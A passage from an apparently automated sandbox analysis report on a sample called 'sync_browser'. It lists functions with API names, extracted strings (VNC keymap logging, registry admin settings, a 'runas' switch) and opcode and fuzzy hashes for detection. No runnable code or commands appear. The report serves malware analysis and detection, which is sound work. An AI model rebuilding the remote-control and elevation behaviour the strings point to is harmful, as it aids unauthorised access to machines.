                                                                    • String ID: -delsoftwarecad$p$runas
                                                                    • API String ID: 397093096-3343046257
                                                                    • Opcode ID: 2d9c0c578c979013a183638fe42de72fccd76df398e534bf6a744ea15e2cbb9d
                                                                    • Instruction ID: d7456952c72751c4f973c1ebb015e693c2b7e575b6a15cad204c2400caa22f6c
                                                                    • Opcode Fuzzy Hash: 2d9c0c578c979013a183638fe42de72fccd76df398e534bf6a744ea15e2cbb9d
                                                                    • Instruction Fuzzy Hash: 9F11BA35518B95C5E7709B50F89939EB3A8FB88744F800236D69D42B94DF7CD16ACB40
                                                                    Function 00007FF6DC177220 Relevance: 12.1, APIs: 8, Instructions: 67COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
                                                                    • String ID:
                                                                    • API String ID: 3778485334-0
                                                                    • Opcode ID: 06a598ca6a92d0ea32fba2d50ca2368aa251c6b52815f87316808892bb3a9e84
                                                                    • Instruction ID: 0b519915dc409b929192b16b4db1c90d3c040924e5bc3c1fb23feac0bf8d742b
                                                                    • Opcode Fuzzy Hash: 06a598ca6a92d0ea32fba2d50ca2368aa251c6b52815f87316808892bb3a9e84
                                                                    • Instruction Fuzzy Hash: 6B31D235A1CB6A85E7509B55FC403AD73A8FB88764F600137DA8E827A5DF7CE066CB00
                                                                    Function 00007FF6DC0C5910 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File$FindFirstModuleName
                                                                    • String ID: *.dsm
                                                                    • API String ID: 1519589655-1970359449
                                                                    • Opcode ID: 5ec88052d5adebc3db2df3dc82cb1158468950cb75ad4b7486c7f1220c09e049
                                                                    • Instruction ID: 8ba37da3c9f9622e416c8fd7e5440f91d4a3149c8387f69e2807ebfc278ee7c4
                                                                    • Opcode Fuzzy Hash: 5ec88052d5adebc3db2df3dc82cb1158468950cb75ad4b7486c7f1220c09e049
                                                                    • Instruction Fuzzy Hash: 9531723560869985EB608B25E9843AF63A0FB487B4F405332DA7E836D4DF3DE11AC700
                                                                    Function 00007FF6DC1177F0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 53registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: PrivateProfile$FileModuleNameQueryValue
                                                                    • String ID: UseRegistry$admin$admin_auth
                                                                    • API String ID: 1028385882-3376419731
                                                                    • Opcode ID: d5f9d5c0af733a8a18aaad5fcf10d0583086e22d43d578638aeb5c775166167f
                                                                    • Instruction ID: c864c981fc3fc41b08c701b51707641f5cd3c61d0f12d24fa34b3fab4049cb7d
                                                                    • Opcode Fuzzy Hash: d5f9d5c0af733a8a18aaad5fcf10d0583086e22d43d578638aeb5c775166167f
                                                                    • Instruction Fuzzy Hash: 2F212F31618A9AC2EB50CB50EC446AE73A8FB98794F801136EA4E83B54CF3DD567CB40
                                                                    Function 00007FF6DC111550 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 47keyboardCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AsyncState$Virtual
                                                                    • String ID: down$vnckeymap.cpp : new state %d (%s)$vnckeymap.cpp : setshiftstate %d - (%s->%s)
                                                                    • API String ID: 2891131044-1915745809
                                                                    • Opcode ID: af929e24d0095cd63bb2d8a54ee9630447cb1a074a3e2900237919080e080432
                                                                    • Instruction ID: 46040faba2a4ce8a0bbeafc46627510464e583b7050a4caa052b5df7319d883c
                                                                    • Opcode Fuzzy Hash: af929e24d0095cd63bb2d8a54ee9630447cb1a074a3e2900237919080e080432
                                                                    • Instruction Fuzzy Hash: C2118F22B28AAB86E6114F15B8001AE6769FB84745F480533ED8EC7665DF3DD53BC740
                                                                    Function 00007FF6DC117750 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 30registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Close$FileModuleNamePrivateProfile
                                                                    • String ID: UseRegistry$admin
                                                                    • API String ID: 3032973919-2802730080
                                                                    • Opcode ID: f394e00a07ad10370d3a9fb3f4169cee617936cad869a8b398f64821c48fdab7
                                                                    • Instruction ID: f5656cddfbb62e7482c8f8f31f28002d50175fa5c241d384308abe808f092356
                                                                    • Opcode Fuzzy Hash: f394e00a07ad10370d3a9fb3f4169cee617936cad869a8b398f64821c48fdab7
                                                                    • Instruction Fuzzy Hash: DD01E125E1DA6B81FE61AB54EC647BD2368FFA9754F850133C91EC2660CE3CE127C650
                                                                    Function 00007FF6DC1847E4 Relevance: 9.1, APIs: 6, Instructions: 80COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                    • String ID:
                                                                    • API String ID: 1239891234-0
                                                                    • Opcode ID: cab22b7f63e68bd4fe1f659d6095baf5ecdb6c5b170d8f81b70fd2e30acf9a7e
                                                                    • Instruction ID: 0d6a486bd4e75e36eba8be3064ccdb005a584f5f2f162e887f95ff6d9fbc3a44
                                                                    • Opcode Fuzzy Hash: cab22b7f63e68bd4fe1f659d6095baf5ecdb6c5b170d8f81b70fd2e30acf9a7e
                                                                    • Instruction Fuzzy Hash: 50319532618B9695EB20CF25EC507AE73A8FB88754F500136EA9D83B94DF3CD566CB00
                                                                    Function 00007FF6DC0F48B0 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 206windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Iconic
                                                                    • String ID: 0
                                                                    • API String ID: 110040809-4108050209
                                                                    • Opcode ID: ada12bffe0504ce749bfb447d148339bb7949db47e61c86c1c89a82587fb054e
                                                                    • Instruction ID: 0ed4aedf2754e2cbce3bb0ac59995899285adf6332fa6b94682a1fc2aa60b1e1
                                                                    • Opcode Fuzzy Hash: ada12bffe0504ce749bfb447d148339bb7949db47e61c86c1c89a82587fb054e
                                                                    • Instruction Fuzzy Hash: E5A149326046958EE7588F39D5407ACB7E0FB48B48F04803AEB59D7689DF39E8A5CB14
                                                                    Function 00007FF6DC117D50 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00007FF6DC0CD390: GetModuleFileNameA.KERNEL32 ref: 00007FF6DC0CD3BB
                                                                    • GetPrivateProfileIntA.KERNEL32 ref: 00007FF6DC117D89
                                                                      • Part of subcall function 00007FF6DC117650: GetPrivateProfileIntA.KERNEL32 ref: 00007FF6DC117689
                                                                      • Part of subcall function 00007FF6DC117650: RegCreateKeyExA.ADVAPI32 ref: 00007FF6DC1176DD
                                                                      • Part of subcall function 00007FF6DC117650: RegCreateKeyExA.ADVAPI32 ref: 00007FF6DC117722
                                                                      • Part of subcall function 00007FF6DC1178E0: GetPrivateProfileIntA.KERNEL32 ref: 00007FF6DC11792E
                                                                      • Part of subcall function 00007FF6DC1178E0: RegQueryValueExA.ADVAPI32 ref: 00007FF6DC11796A
                                                                      • Part of subcall function 00007FF6DC1178E0: RegQueryValueExA.ADVAPI32 ref: 00007FF6DC1179B2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: PrivateProfile$CreateQueryValue$FileModuleName
                                                                    • String ID: UseRegistry$admin$group3
                                                                    • API String ID: 1728753321-3776872688
                                                                    • Opcode ID: da8d5682ec0159b53c6e6ac02bc9a146a6fe897d91bd88be9db6412787fbbace
                                                                    • Instruction ID: 3b579ee539b1640a04990943594bb9c8a3350051f76e04b18514d4aaad2ad556
                                                                    • Opcode Fuzzy Hash: da8d5682ec0159b53c6e6ac02bc9a146a6fe897d91bd88be9db6412787fbbace
                                                                    • Instruction Fuzzy Hash: E1110C35E1C66A81EA21AB65EC613FD6358FFA8344F840537D64DC66A2CE3CE127CB40
                                                                    Function 00007FF6DC117E10 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00007FF6DC0CD390: GetModuleFileNameA.KERNEL32 ref: 00007FF6DC0CD3BB
                                                                    • GetPrivateProfileIntA.KERNEL32 ref: 00007FF6DC117E50
                                                                      • Part of subcall function 00007FF6DC117650: GetPrivateProfileIntA.KERNEL32 ref: 00007FF6DC117689
                                                                      • Part of subcall function 00007FF6DC117650: RegCreateKeyExA.ADVAPI32 ref: 00007FF6DC1176DD
                                                                      • Part of subcall function 00007FF6DC117650: RegCreateKeyExA.ADVAPI32 ref: 00007FF6DC117722
                                                                      • Part of subcall function 00007FF6DC1177F0: GetPrivateProfileIntA.KERNEL32 ref: 00007FF6DC117840
                                                                      • Part of subcall function 00007FF6DC1177F0: RegQueryValueExA.ADVAPI32 ref: 00007FF6DC11787D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: PrivateProfile$Create$FileModuleNameQueryValue
                                                                    • String ID: UseRegistry$admin$locdom1
                                                                    • API String ID: 1788981264-2648182776
                                                                    • Opcode ID: 90366ba7cc0c0a2881363750c1573ef4067fd92e56bfccd46d2f838935763d96
                                                                    • Instruction ID: 0ad1e5c6c3d44f846458c6298e910e39149cc2936547de806b8c60abed446fb1
                                                                    • Opcode Fuzzy Hash: 90366ba7cc0c0a2881363750c1573ef4067fd92e56bfccd46d2f838935763d96
                                                                    • Instruction Fuzzy Hash: 11015625A1C56B41F7119B64DC553BD1299EFA8304F800133D50DC2396DE3CE56BCA80
                                                                    Function 00007FF6DC117EB0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00007FF6DC0CD390: GetModuleFileNameA.KERNEL32 ref: 00007FF6DC0CD3BB
                                                                    • GetPrivateProfileIntA.KERNEL32 ref: 00007FF6DC117EED
                                                                      • Part of subcall function 00007FF6DC117650: GetPrivateProfileIntA.KERNEL32 ref: 00007FF6DC117689
                                                                      • Part of subcall function 00007FF6DC117650: RegCreateKeyExA.ADVAPI32 ref: 00007FF6DC1176DD
                                                                      • Part of subcall function 00007FF6DC117650: RegCreateKeyExA.ADVAPI32 ref: 00007FF6DC117722
                                                                      • Part of subcall function 00007FF6DC1177F0: GetPrivateProfileIntA.KERNEL32 ref: 00007FF6DC117840
                                                                      • Part of subcall function 00007FF6DC1177F0: RegQueryValueExA.ADVAPI32 ref: 00007FF6DC11787D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: PrivateProfile$Create$FileModuleNameQueryValue
                                                                    • String ID: UseRegistry$admin$locdom2
                                                                    • API String ID: 1788981264-80830018
                                                                    • Opcode ID: 453e7d21788d8a281cd3351b72fc90b6b80e6296ed96c2d368ba72f2aba873be
                                                                    • Instruction ID: 29a1318dd3ef76bd8085d0c1e2500abcea30bd3f7d19bd1d6136c483e910eb09
                                                                    • Opcode Fuzzy Hash: 453e7d21788d8a281cd3351b72fc90b6b80e6296ed96c2d368ba72f2aba873be
                                                                    • Instruction Fuzzy Hash: 5C017121E1C56B81FA21DB78AC957BE1399EFB8304F810533D51DC5692CE3CE12BCA80
                                                                    Function 00007FF6DC117F50 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00007FF6DC0CD390: GetModuleFileNameA.KERNEL32 ref: 00007FF6DC0CD3BB
                                                                    • GetPrivateProfileIntA.KERNEL32 ref: 00007FF6DC117F8D
                                                                      • Part of subcall function 00007FF6DC117650: GetPrivateProfileIntA.KERNEL32 ref: 00007FF6DC117689
                                                                      • Part of subcall function 00007FF6DC117650: RegCreateKeyExA.ADVAPI32 ref: 00007FF6DC1176DD
                                                                      • Part of subcall function 00007FF6DC117650: RegCreateKeyExA.ADVAPI32 ref: 00007FF6DC117722
                                                                      • Part of subcall function 00007FF6DC1177F0: GetPrivateProfileIntA.KERNEL32 ref: 00007FF6DC117840
                                                                      • Part of subcall function 00007FF6DC1177F0: RegQueryValueExA.ADVAPI32 ref: 00007FF6DC11787D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: PrivateProfile$Create$FileModuleNameQueryValue
                                                                    • String ID: UseRegistry$admin$locdom3
                                                                    • API String ID: 1788981264-1943432916
                                                                    • Opcode ID: 9d8487c70b1b00fa5a82c873ed5b00f7b51de020590ec98eeb4ab258b7261688
                                                                    • Instruction ID: 30ce5244de5e4e980a20a5252944987d026c3f15c4b2d66afae5b0251bfa0c52
